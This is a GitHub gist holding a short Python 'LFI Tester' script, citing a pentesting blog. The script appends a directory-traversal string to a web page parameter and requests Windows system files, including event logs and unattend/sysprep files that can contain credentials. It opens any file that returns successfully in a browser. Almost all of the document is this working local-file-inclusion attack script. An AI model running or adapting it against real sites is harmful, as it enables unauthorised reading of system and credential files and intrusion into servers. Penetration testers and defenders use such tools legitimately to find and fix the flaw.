Last active
October 20, 2018 10:58
-
-
Save kkirsche/3c9a2df4de8d6dd8d40873a7c1ac001b to your computer and use it in GitHub Desktop.
LFI Tester
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import webbrowser | |
| # formatted using Black | |
| # https://blog.rapid7.com/2016/07/29/pentesting-in-the-real-world-local-file-inclusion-with-windows-server-files/ | |
| url = "http://www.testpage.com?page=" | |
| LFI = "../../../../../../../../../" | |
| pages = [ | |
| "boot.ini", | |
| "WINDOWS/system32/drivers/etc/hosts", | |
| "WINDOWS/system32/win.ini", | |
| "WINDOWS/system32/debug/NetSetup.log", | |
| "WINDOWS/system32/config/AppEvent.Evt", | |
| "WINDOWS/system32/config/SecEvent.Evt", | |
| "WINDOWS/Panther/unattend.txt", | |
| "WINDOWS/Panther/unattend.xml", | |
| "WINDOWS/Panther/unattended.xml", | |
| "WINDOWS/Panther/sysprep.inf", | |
| ] | |
| for x in pages: | |
| check = requests.get(url + LFI + x) | |
| if check.status_code == 200: | |
| webbrowser.open(url + LFI + x) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment